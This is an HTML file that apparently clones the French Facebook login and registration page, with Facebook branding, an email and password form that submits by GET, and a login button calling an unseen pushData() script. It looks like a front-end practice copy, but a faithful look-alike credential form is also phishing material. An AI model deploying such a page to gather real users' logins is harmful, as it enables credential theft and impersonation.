<!DOCTYPE html>
<html>
  <head>
    <title>Facebook</title>
    <link rel="stylesheet" type="text/css" href="/css/style.css" />
    <link rel="facebook-right" href="images/face.png" />
    <link rel="facebook-left" href="images/face2.png" />
    <link rel="icon" href="images/favico.ico" />
    <script src="javascript/login.js"></script>
  </head>
  <body>
    <div>
      <div class="background-top">
        <div class="container-top clearfix">
          <i class="logo-facebook"> </i>

          
            <table cellspacing="0">
              <form   action="/timeline.html"  method="GET" >
              <tbody>
                <tr>
                  <td>
                    <label class="ad"  > Adresse e-mail ou mobile </label>
                  </td>
                  <td>
                    <label for="pass" class="ad">Mot de passe</label>
                  </td>
                </tr>
                <tr>
                  <td>
                    <input type="text" class="box-pe" name="email"  id="inputText" onKeyUp="toggleDisabled(event)" name="text"/>
                  </td>
                  <td>
                    <input type="password" class="box-pe" name="pass"  id="password" onKeyUp="toggleDisabled(event)" name="text"/>
                  </td>
                  <td>
                    <label>
                      <button 
                        class="btn-conx btn-con" type="submit"  
                      action="/timeline.html" id="loginButton"   onclick="pushData();" disabled> Connexion</button>
                     
                    </label>
                  </td>
                </tr>
              </tbody>
              <tr>
                <td class=""></td>
                <td class="">
                  <div style="width: 184px;">
                    <a
                      class="under-log rmv-underline"
                      style="color: #9cb4d8;"
                      href="sfsd/dqsd"
                      >Informations de compte oubliées ?</a
                    >
                  </div>
                </td>
              </tr>
            </table>
          </form>
        </div>
      </div>
    </div>
    <div class="globalContainer">
      <div class="fb_content clearfix" id=" content" role="main">
        <div>
          <div class="gradientcontent">
            <div class="clearfix"></div>
            <div class="background-secondy fb_content content">
              <div class="wrap">
                <div class="left-side">
                  <h2 class="text-left">
                    Avec Facebook, partagez et restez en contact avec votre
                    entourage.
                  </h2>

                  <img
                    class="img"
                    src="images/face2.png"
                    alt=""
                    width="537"
                    height="195"
                  />
                </div>
              </div>
              <div class="right-side">
                <div class="two-text">
                  <div class="inscr space-bottom">
                    Inscription
                  </div>
                  <div class="under-inscr">C’est rapide et facile.</div>
                </div>
                <div class="sec-wrap">
                  <div class="thrd-wrap">
                    <div class="bloc1">
                      <div class="padding">
                        <input
                          type="text"
                          class="two-boxs text-boxs box-rig"
                          name="name"
                          placeholder="Prénom"
                        />
                      </div>
                      <div>
                        <input
                          type="text"
                          class="two-boxs text-boxs box-rig"
                          name="name"
                          placeholder="Nom de famille"
                        />
                      </div>
                    </div>
                    <div class="padding">
                      <input
                        type="text"
                        class="other-boxs text-boxs box-rig"
                        name="name"
                        placeholder="Numéro de mobile ou e-mail"
                        
                      />
                    </div>
                    <div class="padding">
                      <input
                        type="password"
                        class="other-boxs text-boxs box-rig"
                        name="name"
                        placeholder="Nouveau mot de passe"
                       
                      />
                    </div>

                    <div class="" id="birthday_wrapper">
                      <div class="datege-text space-bottom space-top">
                        Date de naissance
                      </div>

                      <div class="">
                        <span
                          class=""
                          data-type="selectors"
                          data-name="birthday_wrapper"
                          id=""
                        >
                          <span style="padding-right: 8px;">
                            <select
                              aria-label="Jour"
                              name="birthday_day"
                              id="day"
                              title="Jour"
                              class="btn-opt"
                            >
                              <option value="0">Jour</option>
                              <option value="1">1</option>
                              <option value="2">2</option>
                              <option value="3">3</option>
                              <option value="4">4</option>
                              <option value="5">5</option>
                              <option value="6">6</option>
                              <option value="7">7</option>
                              <option value="8">8</option>
                              <option value="9">9</option>
                              <option value="10">10</option>
                              <option value="11">11</option>
                              <option value="12">12</option>
                              <option value="13">13</option>
                              <option value="14">14</option>
                              <option value="15">15</option>
                              <option value="16">16</option>
                              <option value="17" selected="1">17</option>
                              <option value="18">18</option>
                              <option value="19">19</option>
                              <option value="20">20</option>
                              <option value="21">21</option>
                              <option value="22">22</option>
                              <option value="23">23</option>
                              <option value="24">24</option>
                              <option value="25">25</option>
                              <option value="26">26</option>
                              <option value="27">27</option>
                              <option value="28">28</option>
                              <option value="29">29</option>
                              <option value="30">30</option>
                              <option value="31">31</option> </select
                            ><!--

--><select
                              aria-label="Mois"
                              name="birthday_month"
                              id="month"
                              title="Mois"
                              class="btn-opt"
                            >
                              <option value="0">Mois</option>
                              <option value="1">jan</option>
                              <option value="2">fév</option>
                              <option value="3" selected="1">mar</option>
                              <option value="4">avr</option>
                              <option value="5">mai</option>
                              <option value="6">jun</option>
                              <option value="7">juil</option>
                              <option value="8">aoû</option>
                              <option value="9">sep</option>
                              <option value="10">oct</option>
                              <option value="11">nov</option>
                              <option value="12">déc</option> </select
                            ><!--



--><select
                              aria-label="Année"
                              name="birthday_year"
                              id="year"
                              title="Année"
                              class="btn-opt"
                            >
                              <option value="0">Année</option>
                              <option value="2020">2020</option>
                              <option value="2019">2019</option>
                              <option value="2018">2018</option>
                              <option value="2017">2017</option>
                              <option value="2016">2016</option>
                              <option value="2015">2015</option>
                              <option value="2014">2014</option>
                              <option value="2013">2013</option>
                              <option value="2012">2012</option>
                              <option value="2011">2011</option>
                              <option value="2010">2010</option>
                              <option value="2009">2009</option>
                              <option value="2008">2008</option>
                              <option value="2007">2007</option>
                              <option value="2006">2006</option>
                              <option value="2005">2005</option>
                              <option value="2004">2004</option>
                              <option value="2003">2003</option>
                              <option value="2002">2002</option>
                              <option value="2001">2001</option>
                              <option value="2000">2000</option>
                              <option value="1999">1999</option>
                              <option value="1998">1998</option>
                              <option value="1997">1997</option>
                              <option value="1996">1996</option>
                              <option value="1995" selected="1">1995</option>
                              <option value="1994">1994</option>
                              <option value="1993">1993</option>
                              <option value="1992">1992</option>
                              <option value="1991">1991</option>
                              <option value="1990">1990</option>
                              <option value="1989">1989</option>
                              <option value="1988">1988</option>
                              <option value="1987">1987</option>
                              <option value="1986">1986</option>
                              <option value="1985">1985</option>
                              <option value="1984">1984</option>
                              <option value="1983">1983</option>
                              <option value="1982">1982</option>
                              <option value="1981">1981</option>
                              <option value="1980">1980</option>
                              <option value="1979">1979</option>
                              <option value="1978">1978</option>
                              <option value="1977">1977</option>
                              <option value="1976">1976</option>
                              <option value="1975">1975</option>
                              <option value="1974">1974</option>
                              <option value="1973">1973</option>
                              <option value="1972">1972</option>
                              <option value="1971">1971</option>
                              <option value="1970">1970</option>
                              <option value="1969">1969</option>
                              <option value="1968">1968</option>
                              <option value="1967">1967</option>
                              <option value="1966">1966</option>
                              <option value="1965">1965</option>
                              <option value="1964">1964</option>
                              <option value="1963">1963</option>
                              <option value="1962">1962</option>
                              <option value="1961">1961</option>
                              <option value="1960">1960</option>
                              <option value="1959">1959</option>
                              <option value="1958">1958</option>
                              <option value="1957">1957</option>
                              <option value="1956">1956</option>
                              <option value="1955">1955</option>
                              <option value="1954">1954</option>
                              <option value="1953">1953</option>
                              <option value="1952">1952</option>
                              <option value="1951">1951</option>
                              <option value="1950">1950</option>
                              <option value="1949">1949</option>
                              <option value="1948">1948</option>
                              <option value="1947">1947</option>
                              <option value="1946">1946</option>
                              <option value="1945">1945</option>
                              <option value="1944">1944</option>
                              <option value="1943">1943</option>
                              <option value="1942">1942</option>
                              <option value="1941">1941</option>
                              <option value="1940">1940</option>
                              <option value="1939">1939</option>
                              <option value="1938">1938</option>
                              <option value="1937">1937</option>
                              <option value="1936">1936</option>
                              <option value="1935">1935</option>
                              <option value="1934">1934</option>
                              <option value="1933">1933</option>
                              <option value="1932">1932</option>
                              <option value="1931">1931</option>
                              <option value="1930">1930</option>
                              <option value="1929">1929</option>
                              <option value="1928">1928</option>
                              <option value="1927">1927</option>
                              <option value="1926">1926</option>
                              <option value="1925">1925</option>
                              <option value="1924">1924</option>
                              <option value="1923">1923</option>
                              <option value="1922">1922</option>
                              <option value="1921">1921</option>
                              <option value="1920">1920</option>
                              <option value="1919">1919</option>
                              <option value="1918">1918</option>
                              <option value="1917">1917</option>
                              <option value="1916">1916</option>
                              <option value="1915">1915</option>
                              <option value="1914">1914</option>
                              <option value="1913">1913</option>
                              <option value="1912">1912</option>
                              <option value="1911">1911</option>
                              <option value="1910">1910</option>
                              <option value="1909">1909</option>
                              <option value="1908">1908</option>
                              <option value="1907">1907</option>
                              <option value="1906">1906</option>
                              <option value="1905">1905</option>
                            </select>
                          </span>
                        </span>

                        <i style="bottom: -3px;" class="point-interro"></i>
                      </div>
                    </div>
                    <div class="tt" id="">
                      <div class="space-bottom space-top datege-text">
                        Genre
                      </div>

                      <span class="style-genre">
                        <span class="style-genre">
                          <input type="radio" name="sex" value="1" />
                          <label class="style2">Femme</label></span
                        >
                        <span class="style-genre"
                          ><input type="radio" name="sex" value="2" /><label
                            class="style2"
                            >Homme</label
                          ></span
                        >
                        <span class="style-genre"
                          ><input type="radio" name="sex" value="-1" />
                          <label class="style2">Personnalisé</label></span
                        ></span
                      >

                      <a class="" id="date-de-naissance-help"  href="#" title="Cliquez ici pour plus d’informations" role="button" ></a>
                      <i style="bottom: -7px;" class="point-interro"></i>
                    </div>

                    <div class="style-text2">
                      <p class="style-text2">
                        En appuyant sur Inscription, vous acceptez nos
                        <a href="/qsq/sqdq" class="rmv-underline"
                          >Conditions générales</a
                        >, notre
                        <a href="/sqfq" class="rmv-underline"
                          >Politique d’utilisation des données</a
                        >
                        et notre
                        <a href="/policies/cookies/" class="rmv-underline"
                          >Politique d’utilisation des cookies</a
                        >. Vous recevrez peut-être des notifications par texto
                        de notre part et vous pouvez à tout moment vous
                        désabonner.
                      </p>
                    </div>

                    <div class="div-inscr">
                      <button type="submit" class="button-inscr button1">
                        Inscription
                      </button>

                      <div id="reg_pages_msg" class="text-bottom-right">
                        <a href="/dfsdf" class="rmv-underline"
                          >Créer une Page</a
                        >
                        pour une célébrité, un groupe ou une entreprise.
                      </div>
                    </div>
                  </div>
                </div>
              </div>
            </div>
          </div>
        </div>
      </div>
    </div>

    <div class="footerA">
      <ul class="footer1">
        <li style="list-style: none;">Français (France)</li>
        <li class="footer-padding">English (US)</li>
        <li class="footer-padding">العربية</li>
        <li class="footer-padding">Italiano</li>
        <li class="footer-padding">Dutesch</li>
        <li class="footer-padding">Español</li>
        <li class="footer-padding">Русский</li>
        <li class="footer-padding">Português (Brasil)</li>
        <li class="footer-padding">हिन्दी</li>
        <li class="footer-padding">中文(简体)</li>
        <li class="footer-padding">日本語</li>
        <li class="footer-padding">
          <a
            role="button"
            class="_42ft _4jy0 _517i _517h _51sy"
            rel="dialog"
            ajaxify="/settings/language/language/?uri=https%3A%2F%2Fja-jp.facebook.com%2F&amp;source=www_list_selector_more"
            href="#"
            title="Voir plus de langues"
            ><i class="img sp_1cLUFecMJSs sx_e52bb9"></i
          ></a>
        </li>
      </ul>
      <div id="bar"></div>

      <div style="line-height: 0.6; width: 911px;">
        <ul class="foot3">
          <li>Inscription</li>
          <li>Connexion</li>
          <li>Messenger</li>
          <li>Facebook Lite</li>
          <li>Watch</li>
          <li>Personnes</li>
          <li>Pages</li>
          <li>Catégories de Page</li>
          <li>Lieux</li>
          <li>Jeux</li>
          <li>Lieux</li>
          <li>Marketplace</li>
          <li>Groupes</li>
        </ul>
        <ul class="foot3">
          <li>Instagram</li>
          <li>Local</li>
          <li>Collectes de fonds</li>
          <li>Services</li>
          <li>À propos</li>
          <li>Créer une publicité</li>
          <li>Créer une Page</li>
          <li>Développeurs</li>
          <li>Emplois</li>
          <li>Confidentialité</li>
          <li style="padding-right: 15px;">Cookies</li>
        </ul>
        <ul class="foot4">
          <li>Choisir sa pub</li>
          <li style="padding-left: 20px;">Conditions générales</li>
          <li style="padding-left: 20px;">Aide</li>
        </ul>
      </div>

      <p class="fb-bottom">Facebook © 2020</p>
      <p></p>
    </div>
    <script  src="javascript/js.js "></script>
  </body>
</html>
